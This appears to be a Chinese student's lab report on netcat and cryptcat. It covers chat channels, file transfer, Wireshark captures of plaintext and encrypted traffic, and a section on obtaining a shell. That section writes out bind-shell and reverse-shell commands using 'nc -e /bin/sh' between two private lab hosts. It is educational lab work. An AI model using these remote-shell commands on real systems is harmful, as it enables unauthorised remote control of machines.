内容
(1)Netcat建立通信通道、监控和文件传输
(2)Cryptcat建立加密通信隧道
(3)*Rootkit文件隐藏及检测 (加分实验)
原理
netcat:
netCat是一个非常简单的Unix工具,可以读、写TCP或UDP网络连接(network connection)。它被设计成一个可靠的后端(back-end) 工具,能被其它的程序或脚本直接地或容易地驱动。同时,它又是一个功能丰富的网络调试和开发工具,因为它可以建立你可能用到的几乎任何类型的连接,以及一些非常有意思的内建功能。NetCat小巧且功能强大,可谓是居家旅行出门必备的“瑞士军刀”。
netcat命令参数:
-d 后台模
-e程序重定向,一旦连接,就执行 [危险!!]
-g 网关源路由模式的跳数,最多为8
-G 源路由模式的节点个数,一般为4,8,12, …n-h 帮助信息
-i secs 延时的间隔
-l 监听模式,用于入站连接
-L 连接关闭后,仍然继续监听
-n 指定数字的IP地址,不能用hostname
-o file 记录16进制的传输
-p port 本地端口号
-r 随机本地及远程端口
-s addr 本地源地址
-t 使用TELNET交互方式
-u UDP模式
-v 详细输出–用两个-v可得到更详细的内容
-w secs 指定扫描所用的时间
-z 将输入输出关掉–用于扫描时
4.实验记录
实验环境:
客户端:kali-客户端 192.168.9.4
服务器端:kali-服务器端 192.168.9.5
实验过程:
(一)Netcat建立通信通道:
在服务器端对1234端口进行监听
命令:
nc -lp 1234
在客户端连接服务器端的1234端口
nc 192.168.9.5 1234
连接成功后,双方可以交互信息:
服务器端:
客户端:
通过wireshake抓包分析:
在抓获的数据包中,查看TCP的数据包中的Data数据部分,可以看出发送的信息,以明文的方式传输,在抓获的数据包中,看到了NTP协议,通过查阅资料,了解到NTP是网络时间协议,用于网络时间同步,使网络中的计算机时钟同步到UTC,再配合各个时区的偏移调整就能实现精准同步对时功能。NTP协议实现了客户端与服务器端的信息同步。
(二)netcat进行文件传输
将客户端的文件传输到服务器端
在客户端创建一个jyh.txt文件
客户端通过1234端口将文件jyh.txt发送给服务器端
在服务器端监听1234端口
服务器端查看文件内容:
Wireshake抓包分析:
由抓包数据包可看出,在文件传输中,文件以明文的方式将内容发送给了服务器端。
(三)获取shell
在服务器作为被害者,在控制端进行输入
nc –lvp 1234 –e /bin/sh
客户端作为攻击者,连接受害者的端口,并且可以在控制端输入课执行命令:
反向shell:
服务器作输入:
nc –lvp 1234
客户端输入:
nc 192.168.9.5 1234 –e /bin/bash 告诉服务器端netcat在连接完成之后,执行shell
接着就可以在服务器中输入可执行命令,查看客户端系统信息
(四)Cryptcat建立加密通信隧道
在前几个中的传输都是明文传输,为了保证隧道中数据的安全性,用cryptcat对隧道数据进行加密。
在服务器端设置密码,并监听1234端口,开启wireshake进行抓包
客户端进行连接
连接成功后,两边即可互相通信
服务器端发送this is server信息
客户端发送this is client信息进行回应
查看wirshake抓包显示:
抓获的数据都是加密之后的。
5.结论与建议
通过本次实验,对nc有了进一步了解,netcat可以检测端口是否开放,建立消息通道,以及传输文件,获取shell,netcat本身是以明文传输的,可以用cyptcat进行对数据进行加密。本实验疑惑是在获取shell以及反向shell方面的理解方面。
6452
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
